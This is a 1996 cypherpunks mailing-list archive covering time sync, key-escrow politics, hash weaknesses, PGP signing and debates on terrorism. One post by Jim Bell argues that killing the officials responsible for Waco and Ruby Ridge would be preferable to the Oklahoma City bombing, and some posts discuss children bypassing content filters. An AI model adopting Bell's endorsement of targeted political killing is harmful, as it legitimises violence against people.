W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Fri, 5 Jul 1996 17:07:39 +0800
To: cypherpunks@toad.com
Subject: Re: Computer-Aided Revolution
Message-ID: <1.5.4.32.19960705062727.008f8f04@www.nextron.ch>
MIME-Version: 1.0
Content-Type: text/plain


>> I've thought of an application for a "revolutionary" program for peaceful 
>> protest, but one that requires that a substantial number (1000) of people 
>> have access to computer time synchronized to 1 second, ideally 0.1 second.  
>> How good would a time sync over the  net typically be?

Well, in Europe you could just buy a 40$ hardware (DCF-77 receiver) which
syncs with the standardized broadcasted atomic clock. you could sync the
stations every second with an accuracy of better than 10^-3 secs, like a
GPS, only much cheaper. (although, you wouldn't know you geographic location ;-)
----------< fate favors the prepared mind >----------
Remo Pini                      Fon 1: +41 1 350 28 82
mailto:rp@rpini.com            Fon 2: +41 1 465 31 90
http://www.rpini.com/remopini/ Fax:   +41 1 350 28 84
--------< words are what reality is made of >--------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Sat, 6 Jul 1996 00:21:25 +0800
To: cypherpunks@toad.com
Subject: Libertarian Anti-GAK Platform
Message-ID: <199607051311.JAA14454@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Y'all:

Just got an e-mail from Jim Ray, who added the anti-GAK
provision to the Libertarian Party Platform yesterday.
So, yes, it WAS one of us.

Good job, Jim!

Regards,

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com
Date: Sat, 6 Jul 1996 00:29:06 +0800
To: William Knowles <erehwon@c2.org>
Subject: Re: Word lists for passphrases
Message-ID: <2.2.32.19960705131244.00687f3c@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:12 AM 7/5/96 -0700, you wrote:
:Greg,
:
:>Are there any publically available word lists which contain just about
:>every word in the English language?
:
:I would try this site out. It is very complete and should fill the bill.
:
:ftp://sable.ox.ac.uk/pub/wordlists/
:
:Good Luck!
:
:
:-William Knowles
: erehwon@c2.org
: Finger for public key
:
I am not sure of your purposes, but I suggest you take a look at Arnold
Reinhold's Diceware page.

http://world.std.com/~reinhold/diceware.page.html

The list it contains certainly is not "every word in the English language,"
but the list he offers is large and well set up; I load mine from Wordpad.
It is part of a randomness system he espouses.

Alec 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 6 Jul 1996 04:47:29 +0800
To: cypherpunks@toad.com
Subject: Re: Net and Terrorism.
Message-ID: <199607051652.JAA15062@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:29 AM 7/5/96 -0700, Timothy C. May wrote:
>At 2:37 AM 7/5/96, vinnie moscaritolo wrote:
>
>>>There is no cure for the "revolutionary" terrorists ..
>>> If we do not even print their obit, there is no glory!
>>
>>Tim, you are asking for the liberal media to act responsibly.. what were
>>you thinking?
>
>I did not write that.
>
>However, I wouldn't think that "not printing their obit" is acting
>responsibly. As far as I'm concerned, I want the full news, or at least
>some reasonable approximation of it, not propaganda.
>--Tim May

Well, whoever wrote those two lines above, he hit upon something I've long 
believed: The ability to force other people to (in effect) ignore dissent up 
to and including "terrorism" is extraordinarily valuable.  Remember the old 
philosophical question, "If a tree falls in the forest and there's nobody 
there to hear, does it make a sound?"  Scientifically, the answer's obvious. 

But _politically_ it isn't so obvious:  If an act of "terrorism" occurs and 
the government can cover it up (or merely cover up the terroristic cause), 
the government is probably actually better off (considering _only_ the 
government's own interests) ignoring it and not exposing an embarrassing 
vulnerability, or possibly an embarrassing guilt, which induced the 
terrorist to attack. 

  The government would probably have much preferred, for example, for 160+ 
people to be killed in an airliner that just happened to disappear off the 
radar screen and fall into the ocean, than the bombing in Oklahoma City, 
because the latter incident puts a powerful onus on the government to "do 
something" while an unexplained event  (or one where the cause is covered 
up) has no such imperative.  And I'm not talking primarily of retribution or 
punishment, either:  Today, the government's under some pressure to simply 
stop doing things that would be expected to lead to retribution, like Waco 
and Ruby Ridge, and the government's  misbehavior is highlighted by 
incidents such as the OKC bombing.

In addition, a potential "terrorist" is less likely to try something if the 
government is likely to be able to cover it up.  Ironically, this probably 
tends to induce such people to do things (like huge bombings) which _can't_ 
be covered up, rather than smaller, more individualized strikes.  That makes 
the non-governmental public less safe, which is a serious conflict of 
interest between the government and the citizenry.

I consider it axiomatic that whoever bombed the OKC building, he would have 
preferred killing one to two dozen people most responsible for Waco or Ruby 
Ridge than those who actually died.  The public has every reason to prefer 
this alterative as well.  The only people who can be expected to disapprove 
are government employees, who don't want to be held responsible (legally or 
"illegally") for what they did.

If anything, I think the public would be far better off if there was a 
mechanism to allow even these "terrorists" to speak directly to the public, 
without censorship by the governments or heightened risk of capture.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Sat, 6 Jul 1996 01:57:32 +0800
To: cypherpunks@toad.com
Subject: Re: Net and Terrorism.
Message-ID: <9607051439.AA07350@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 05:43 PM 7/4/96 -0700, Timothy C. May wrote:
>Anyway, I should point out that Mormons (or Latter Day Saints, I guess) are
>spreading quickly around the world...all WITHOUT using "conversion by the
>sword," as some other well-known religions are wont to do.

        Perhaps you've read this before (or it's even been mentioned here
before) but an excellent book exists that discusses some of the points you
touch upon (suicide, martyrs, religion (meme) propagation). See Bloom, "The
Lucifer Principle."

_______________________
Regards,            He who knows others is wise. 
		    He who knows himself is enlightened.
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Sat, 6 Jul 1996 02:04:40 +0800
To: "Deranged Mutant" <gary@systemics.com>
Subject: Re: What remains to be done.
Message-ID: <9607051439.AA07353@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 12:58 PM 7/4/96 +0000, Deranged Mutant wrote:
>Another need is for file/disk-encryption utilities.  I'm not familiar 
>with what's out there for Macs, but for PCs there's SFS and ASPICRYP
>for SCSI drives (with no source!) and SFS, SecureDrive and SecureDevice
>for HD (or FD).  The latter won't work on Win95. AFAIK, SFS and 
>SecureDrive aren't 100% friendly with Win95 either, though they'll work.

        I'll just add that Jetico puts out BCrypt, which works perfectly
with Win95. Of course it costs, but one can try out the software only
version, then upgrage to hardware encryption!
_______________________
Regards,            He who knows others is wise. 
		    He who knows himself is enlightened.
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Herb Lin" <hlin@nas.edu>
Date: Sat, 6 Jul 1996 02:43:48 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: SAFE forum -- remarks of Herb Lin
Message-ID: <9606058365.AA836589679@nas.edu>
MIME-Version: 1.0
Content-Type: text/plain


  You're entitled to any spin you wish (see your [...] below).  But my
  original intent was to say
  the part about "and it is" in any event; unfortunately, the audience
  started snickering
  before I got to it.  In the future, I will say "Crime prevention ought to
  be, and is, a part
  of the FBI's mission", thereby pre-empting premature snickering by an
  audience
  pre-disposed to be unfriendly or derisive to law enforcement.

  Begin personal comment from herb:

  The "overview and recommendations" document summarizing
  the report notes that

  "Input from [..] diverse sources demonstrated to the committee
  a considerable amount of confrontation and disconnect between
  interest groups (e.g., information technology vendors, businesses,
  law enforcement, private individuals, national security) that fail
  to understand or appreciate the validity of each other's policy
  needs and interests with respect to cryptography.  . . .

       Public debate based on hyperbole is unproductive.  All of the
  stakes described above -- privacy for individuals, protection of
  sensitive
  or proprietary information for businesses, ensuring the continuing
  reliability
  and integrity of nationally critical information systems and networks,
  law
  enforcement access to stored and communicated information for purposes of
  investigating and prosecuting crime, and national security access to
  information
  stored or communicated by foreign powers or other entities and
  organizations
  whose interests and intentions are relevant to the national security and
  the
  foreign policy interests of the United Statesare legitimate; informed
  public
  discussion of the issues must begin by acknowledging the legitimacy both
  of information security for law-abiding individuals and businesses and of
  information gathering for law enforcement and national security
  purposes."

  My experience with the FBI and other law enforcement officials is that
  they are honorable
  people trying to do a very hard job.  You may disagree with them on
  policy grounds --
  indeed, the NRC report does disagree with the Administration in certain
  important ways --
  but in my personal opinion, law enforcement deserves credit rather than
  censure for trying to anticipate a future problem,  You may believe the
  proposed solution to be inappropriate, but I'd
  ask those of you who follow the debate to engage it on substantive rather
  than ad hominem grounds,  Many of you in the cypherpunk community have
  done so, and I applaud such efforts.

  [End personal  comment]

  herb
  ==
On Wed, 3 Jul 1996, Herb Lin wrote:

> Folks -- I object to the characterization of my remarks about crime
prevention > being made with sarcasm.  The complete remark was "Crime
prevention ought > to be part of the FBI's mission, ... and it is -- ask
them, and they
acknowledge
>  that."

OK, sorry, my reading.  I'd certainly hate to jeopardize any professional
relationships by implying that you'd been poking fun at them on purpose.
There's already far too much distrust to go around.

As I recall, the sequence went "Crime prevention ought to be part of the
FBI's mission [audience snickers, Herb realizes what he just said and
smiles]... and it is -- ask them, and they acknowledge that."

The best standup comics are the genuine straight men, I guess. To avoid any
trouble, I'll be using that line *without* specific attribution from now
on.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Anderson <ota+@transarc.com>
Date: Sat, 6 Jul 1996 02:20:27 +0800
To: aka@mindspring.com
Subject: Fwd: CWD -- Jacking in from the "Keys to the Kingdom" Port
In-Reply-To: <Pine.SUN.3.94.960704083858.14638B-100000@netcom17>
Message-ID: <UlrH0_KSMV0=0m4U40@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


See the sig at the end. -ota

---------- Forwarded message begins here ----------

Date: Thu, 4 Jul 1996 08:41:35 +0000 (GMT)
From: jonathon <grafolog@netcom.com>
To: "Mark M." <markm@voicenet.com>
cc: David Rosoff <drosoff@arc.unm.edu>, Declan McCullagh <declan@well.com>,
        cypherpunks@toad.com
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port

On Wed, 3 Jul 1996, Mark M. wrote:

> On Wed, 3 Jul 1996, David Rosoff wrote:
> > I've wondered .. could a creative child circumvent these filter programs
> If the child is creative enough, he will be able to boot DOS from a bootdisk
> and remove the line from config.sys that starts up the filtering software.

	Even more creative kids will find the Dos-based web browser
	that bypasses whatever is in the config.sys file, that is 
	supposed to prevent them from seeing those "naughty" websites.
	
        xan

        jonathon
        grafolog@netcom.com


	AOL coasters are unique, and colourful.  
		Collect the entire set. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Date: Sat, 6 Jul 1996 03:03:36 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Lack of PGP signatures
Message-ID: <AE02AB9A-EDB96@193.239.225.200>
MIME-Version: 1.0
Content-Type: text/plain


>It is not possible to clear-sign binaries with PGP.  The point of clear-
>signing
>is to have signed text that is readable to people who don't have the
>software
>necessary to process the text.  It would make sense to clearsign a file
that
>is base64'ed or uuencoded, which wouldn't alter the contents of the file. 
I
>can't see how such an option would be harmful, except that it might lose
>some
>characters that are important to the context of the message.
>

Mark,

Of course you can use pgp to sign binaries.  How else did the pgp binary
itself get signed?  You can either sign it in a separate file, or in the
same file.  PGP sorts it out for you.  

What do you use it for?  Same reasons you sign text.  "I signed this file"
means that you vouch for it in some undefined way (maybe I wrote and
compiled it, or somesuch).  

	Clay

***************************************************************************
Clay Olbon II       *      Clay.Olbon@dynetics.com
Systems Engineer    *    PGP262 public key on web page
Dynetics, Inc.      * http://www.msen.com/~olbon/olbon.html
***************************************************************** TANSTAAFL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sat, 6 Jul 1996 06:21:18 +0800
To: "David F. Ogren" <ogren@cris.com
Subject: Re: rsync and md4
Message-ID: <199607051844.LAA27223@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:05 AM 7/1/96 -0400, David F. Ogren wrote:
> I stand by my statements. 

When you are deep in a hole, it is time to quit digging.


> The problems that you bring up have to do with situations 
> where an active attacker develops a slightly different 
> pair of documents with the same hash.
>
> Although this is highly undesirable characteristic for a 
> hash function, [...]

No kidding.

Current state of the art is that MD4 is broken for signing
documents prepared by other people, and MD5 may be broken 
soon, but MD4 is not broken as proof of authorship.

So if everyone was using MD4 for PGP signing, which they are
not, it would still not be a problem for most people.  But
it would be a problem for authors of software, who should
know that a security bug that sinks only *some* people is still
a security bug.  

Therefore no author of software should
employ MD5 or MD4 in new software, but existing users
of software that employs MD5 and MD4 should not panic.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 6 Jul 1996 03:22:26 +0800
To: cypherpunks@toad.com
Subject: Re: The Net and Terrorism
Message-ID: <2.2.32.19960705153701.0082c960@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:33 PM 7/3/96 -0700, Timothy C. May wrote:

>My article made my points, so I won't rewrite it here. You are of course
>not required to agree. You are free to live in crowded cites--near "soft
>targets." You are welcome to lobby for world peace and for economic changes
>to lessen terrorism.
>
>(I think this is mostly hopeless. No matter how "nice" conditions get, for
>game-theoretic reasons there will be some groups seeking changes.)

I am not sure who is right in this debate.  I know that the "why can't we
all just get along?" crowd is asking a stupid question.  There are lots of
reasons people can't get along and there have been enough "top-down" imposed
social changes this century to suggest that "changing society" won't
preserve the peace.

On the other hand, I'm not sure that Tim's pessimism is warranted.  This
argument that cities will become completely unlivable and the only way to
survive is to move out into less populated areas has been going on in the
libertarian, survivalist, and right-wing-nut communities since the 1960s.
The magazines Vonulife and Libertarian Connection used to talk a lot about
the relative merits of Nomadism or Troglodytism, suitcase nukes, and such.  

Those who took the advice and moved into caves in 1969 have sure had an
uncomfortable 30 years.  Mel Tappan (author of Survival Guns) may have died
from a heart attack which he could have survived had he not moved into the
boonies.  I note as well that Tim is not all that far away from civilization
and its discontents.  North Dakota or Labrador would be better choices if
separation were really desired.

Those of us in the Techno-Libertarian Panglossian Community argue that it is
at least possible that the spread of markets will serve to bend the world's
population to bourgeois values before nanotech gives everyone the power to
destroy the world.

Note that markets (like networks) can expand faster than outside observers
can believe once a critical mass of participants is achieved.  We see that
happening all around the world in the case of both markets and networks.
Even hard cases like Africa and the Middle East will find themselves swept
up in a short time (by historical standards).  It's hard to get people who
are making lots of dough to strap dynamite to their bodies and go blow up a bus.

Then Larry said:

>>because it is a fact of life, is erroneous in my view. it is a common
>>libertarian argument that goes, "criminality is everywhere, so why try
>>to stop it?"  a rather juvenile ideology.  

In all my years of reading and listening to libertarian agitprop, I've never
heard this argument.

And back to Tim:

>(And my point about moving out of cities referred to what *I* am doing;
>others are of course free to mingle in crowded markets, hoping that the
>bombs won't come that day. Others are free to send their children to day
>care centers located in likely targets for ZOG's enemies to bomb, and so
>on.)

Kids sent to day care centers operated by the federal government or schools
operated by local governments are going to be in a bad way in any case
whether or not they are blown up or shot (as in Stockton and Scotland).  I
*love* the Volvo ads which feature mom driving her kids to school in a Volvo
with all of its safety features and then turing the kids over to the
government for indoctrination.  Much better she should drive them to private
schools in a Chevy 
Corvair.  They'll live longer (certainly in the spiritual sense of "live").

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@gti.net>
Date: Sat, 6 Jul 1996 03:16:39 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
In-Reply-To: <1.5.4.16.19960704232548.0b77fbf4@arc.unm.edu>
Message-ID: <199607051544.LAA20442@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be David Rosoff wrote:
: 
: >	That "creative child" would have to be pretty damn smart to do
: >what you described.
: 
: It would actually take less creativity to do the other things, bypass the
: config.sys, etc. The child would thus be perhaps a little TOO creative. :)
: 

2 short replies in one post:

A)  Who said anything about a creative child?  How about a creative
    c'punk?

B)  Forget the CONFIG.SYS ... what about kids using Macs or some future
    "Kid Safe" system that has the filters in an eeprom?  I'm talking
    about bypassing the censorship on the client-server level.  Relatively
    platform independent.

- -- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMd04PA0HmAyu61cJAQHaPwP/VkH9kMZkZGXe5Njz9HRLzPep+EwRGSBf
zfX5z8VPxMpDUdBWSKHyZgakckkWWg5e6zNUXtOI6diKtIuPXboVC8/5wY1PN5vX
qyEGzN8L97MFOvkKNmQVmWTdfou7Tyd8sd5GfBpYt6WoIYmux2ovz+hRhW5Pg2g+
MhImPjT3k7Q=
=EilI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CyberEyes <cyberia@cam.org>
Date: Sat, 6 Jul 1996 03:50:55 +0800
To: cypherpunks@toad.com
Subject: Re: Net and Terrorism.
In-Reply-To: <Pine.LNX.3.93.960702200153.383A-100000@smoke.suba.com>
Message-ID: <Pine.GSO.3.94.960705120406.23070B-100000@Stratus.CAM.ORG>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jul 1996, snow wrote:

>      2) When they _are_ exposed, let them fight the fuck back. Rules of 
>         engagment are simple. When fired on, shoot to kill. If the shot 
>         comes from a building, take out the building. If from a crowd, 
>         well, do you best, but _get the shooter_. 

	Basically, what you're saying is that one armed person in a crowd
of a hundred needs to be killed no matter what happens to the lives of the
other 99? Give me a break, we're not living in the 1800's anymore, we want
to STOP wars, not create them!

> 	If the US were to offer Russia $3 billion (or whatever) 
> in a one time take it or leave it for their entire chemical weapon stock,
> it might get the soviet shit off the market. The nuclear stuff is a little 
> easier to store (I think) and it would be a harder sell. 

	You'll never see it happen. First of all, a lot of the chemical
weapons in the former Soviet Union are probably not even owned by the
government, some are probably owned by private individuals. Secondly, the
former Soviet Union would never give up all their chem. weapons for the
same reason, that the U.S.A would not give up theirs (they'd be left
defenseless, or very open).

Ryan A. Rowe - Montreal, Quebec        /Seeking Internet-related job!/ 
aka CyberEyes, Rubik'S Cube              I will relocate _ANYWHERE_.

Tel. -> +1-514-626-0328                |                 __o         o
E-Mail -> cyberia@cam.org              |               _ \<_        <\
WWW -> http://www.cam.org/~cyberia     | __/\o_       (_)/(_)       />
IRC -> #CAli4NiA, #Triathlon, #Surfing |
FTP -> ftp.cam.org /users/cyberia      |  swim          bike       run

          Read my C.V. at http://www.cam.org/~cyberia/resume-e.html 
           "In lieu of experience, I have a willingness to learn."

             "Everyone has their day, mine is July 15th, 1998."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CyberEyes <cyberia@cam.org>
Date: Sat, 6 Jul 1996 04:32:42 +0800
To: cypherpunks@toad.com
Subject: Re: Net and Terrorism.
In-Reply-To: <199607040558.WAA07424@primenet.com>
Message-ID: <Pine.GSO.3.94.960705122330.23070C-100000@Stratus.CAM.ORG>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Jul 1996, attila wrote: 

> "denied zones" (we were never there) is no longer in vogue.  however, we
> will probably see that again in parts of the world as many cultures do
> not have the basic respect for life we do.  

	What is your last comment supposed to mean exactly? Just because
some Islamic militants decide to kill a few people in a terrorist attack
does not mean that the entire believer population of Islam does not have
respect for life. Just who is "we"? Americans? Europeans? All
industrialized nations? Every country except those Third World ones? Uh...
I don't see your point very clearly here... The only culture I can think
of that might now have respect for life are cannibals, and they DO have
respect for life in a way, they don't kill each other (I don't think), and
they do it because it's their lifestyle, but they don't perform
cannibalistic acts out of malice. Correct me here if I'm wrong.

Ryan A. Rowe - Montreal, Quebec          /Seeking Internet-related job!/    
aka CyberEyes, Rubik'S Cube                I will relocate _ANYWHERE_. 

Tel. -> +1-514-626-0328                |                 __o         o
E-Mail -> cyberia@cam.org              |               _ \<_        <\
WWW -> http://www.cam.org/~cyberia     | __/\o_       (_)/(_)       />
IRC -> #CAli4NiA, #Triathlon, #Surfing |
FTP -> ftp.cam.org /users/cyberia      |  swim          bike       run

          Read my C.V. at http://www.cam.org/~cyberia/resume-e.html 
           "In lieu of experience, I have a willingness to learn."

             "Everyone has their day, mine is July 15th, 1998."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CyberEyes <cyberia@cam.org>
Date: Sat, 6 Jul 1996 04:20:24 +0800
To: cypherpunks@toad.com
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
In-Reply-To: <Pine.SUN.3.94.960704083858.14638B-100000@netcom17>
Message-ID: <Pine.GSO.3.94.960705123427.23070E-100000@Stratus.CAM.ORG>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Jul 1996, jonathon wrote:

> 	Even more creative kids will find the Dos-based web browser
> 	that bypasses whatever is in the config.sys file, that is 
> 	supposed to prevent them from seeing those "naughty" websites.

	I think you're talking about Lynx. If you are, they'd need a shell
account to access it. Most ISP's like AOL, CompuServe, Prodigy, and others
don't offer that. They'd also have to set it up through a communications
program in DOS. Anyways, if you're NOT talking about Lynx, what DOS-based
Web browser is there?

Ryan A. Rowe - Montreal, Quebec        /Seeking Internet-related job!/ 
aka CyberEyes, Rubik'S Cube              I will relocate _ANYWHERE_.

Tel. -> +1-514-626-0328                |                 __o         o
E-Mail -> cyberia@cam.org              |               _ \<_        <\
WWW -> http://www.cam.org/~cyberia     | __/\o_       (_)/(_)       />
IRC -> #CAli4NiA, #Triathlon, #Surfing |
FTP -> ftp.cam.org /users/cyberia      |  swim          bike       run

          Read my C.V. at http://www.cam.org/~cyberia/resume-e.html 
           "In lieu of experience, I have a willingness to learn."

             "Everyone has their day, mine is July 15th, 1998."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 6 Jul 1996 04:32:57 +0800
To: Clay Olbon II <Clay.Olbon@dynetics.com>
Subject: Re: Lack of PGP signatures
In-Reply-To: <AE02AB9A-EDB96@193.239.225.200>
Message-ID: <Pine.LNX.3.94.960705124303.225A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 5 Jul 1996, Clay Olbon II wrote:

> Mark,
> 
> Of course you can use pgp to sign binaries.  How else did the pgp binary
> itself get signed?  You can either sign it in a separate file, or in the
> same file.  PGP sorts it out for you.  
> 
> What do you use it for?  Same reasons you sign text.  "I signed this file"
> means that you vouch for it in some undefined way (maybe I wrote and
> compiled it, or somesuch).  

I didn't say that binaries couldn't be signed.  I said they couldn't be
*clear*-signed.  There is a difference between clearsigning and creating a
signature certificate that is either concatenated with the data or written
to a separate file.  If somebody who doesn't have PGP gets a file that is
signed by PGP, the file is completely useless to that person.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMd1G47Zc+sv5siulAQEjvQQAg57AF6FAZbQ8EeOJ2CH9UCTDB5rfNl3B
e5OUIgLMHLnkix8xQchoTEXo0f4spBRjddUu5fy16nP5k9ZNiyKCAYOYZZeiR7n9
cG/reikrCbW02/kAlCJcdoNIsTFXuauf3qity+Co1x2afu0Nl/V4vwvaAzxyLHRK
tYECCec7pNY=
=iR57
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sat, 6 Jul 1996 04:47:14 +0800
To: frissell@panix.com
Subject: I confess [Was: Who was that Masked Cypherpunk?]
Message-ID: <199607051657.MAA67090@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Duncan Frissell <frissell@panix.com> wrote:

>OK, fess up.  Who was it who amended the anti-key-escrow language of the
>Libertarian Party Platform live on CSPAN?  Specific reference to >cypherpunks.

'Twas me, the guardian of the *original* definition of the fine old
term "escrow" against the slick denizens of Newspeak. I have found
this Libertarian convention to be a super-fun experience, and I will
be demonstrating PGP, Private Idaho, and lots of other fun stuff on
Saturday at 3PM. All are invited to attend.

Watch for "Pennies for Perot" this afternoon! ;)
JMR -- Dade Chairman and Florida Delegate.

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"It is long past time to end the laughable presumption that voters
 who can easily cope with the choices offered at Burger King are
 somehow 'confused' by more than two choices at the voting booth."
 -- me [From my Miami Herald article.]

"Truth is stranger than fiction, especially when 'truth' is being
 defined by the O.J. Simpson Defense Team." -- Dave Barry 6/16/96
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray Coming
soon, "Pennies For Perot" page! CYA with  http://www.anonymizer.com
___________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMd1Ii21lp8bpvW01AQEBWAQAoWqyLNe921Dx9HXbMFVoW2ReNGp0Qo6r
mZd3FvNcJDw4bOeI434sekDwAEg9G2SiCCnBMBFrilZnKscMZpZp0XdNV6+b52FN
MtyYW9yYQSRRgixjf3+j6O6jecPynztdugnnWY7Y8jWcb3ukipYYt4cQAVL13sX4
Aknxd4DXtzc=
=lvW8
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Date: Sat, 6 Jul 1996 05:23:04 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Lack of PGP signatures
Message-ID: <AE02CA43-160FAC@193.239.225.200>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. <markm@voicenet.com> wrote:

>I didn't say that binaries couldn't be signed.  I said they couldn't be
>*clear*-signed.  There is a difference between clearsigning and creating a
>signature certificate that is either concatenated with the data or written
>to a separate file.  If somebody who doesn't have PGP gets a file that is
>signed by PGP, the file is completely useless to that person.
>

My mistake.  I guess I still don't understand your point however.  Of what
use is a signature on a file to someone who cannot check its validity?   It
seems to me that a separate signature file for a binary would serve the
same purpose ("gee, it LOOKS like somebody signed it").

	Clay


***************************************************************************
Clay Olbon II       *      Clay.Olbon@dynetics.com
Systems Engineer    *    PGP262 public key on web page
Dynetics, Inc.      * http://www.msen.com/~olbon/olbon.html
***************************************************************** TANSTAAFL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rschp2.anu.edu.au>
Date: Fri, 5 Jul 1996 14:14:17 +0800
To: cypherpunks@toad.com
Subject: Re:What remains to be done: keeping info free
Message-ID: <199607050336.UAA07204@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hal Finney writes.. 
> From: Black Unicorn <unicorn@schloss.li>
> > A.  Methods to run secure websites on insecure servers.
> > [...]
> > A software solution which permits local decryption makes traffic analysis
> > less useful, presents the opportunity to use front end and disposable www
> > pages on domestic ISPs while imposing no liability on the ISP itself, and
> > opens several more effective traffic analysis deterants.

> I don't quite understand what is being proposed here.  If the
> information on the web site is encrypted, who is supposed to be able to
> decrypt it?  Just one person, or some select group of people?  My

If the objective is to keep information available 
then check out Ross Andersons "eternity service" proposal 
(http://www.cl.cam.ac.uk:80/users/rja14/#Lib)
which outlines a "highly distributed, resilient and anonymous file store.
Once a document is published on it, the courts will simply not be able 
to find and delete all the copies"

Sherry


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMdyPeOFu4n6w1qeBAQF4igP/bhD22woqB8W2kglF6r6Z4rdUVDzGrXk4
N9Iav/KnUtAlmWb/yItHg9+uwAPRtomkTeOZye5UcmJzYI8WERyBYi5Y4OghA48a
vo9C/Qo4znljc2J3+J1nWuuDp1khSVB/b+B1/r2zqN/Uv7YvwkF9cext/bf8XV/G
uxPJz0DvSLE=
=jiix
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
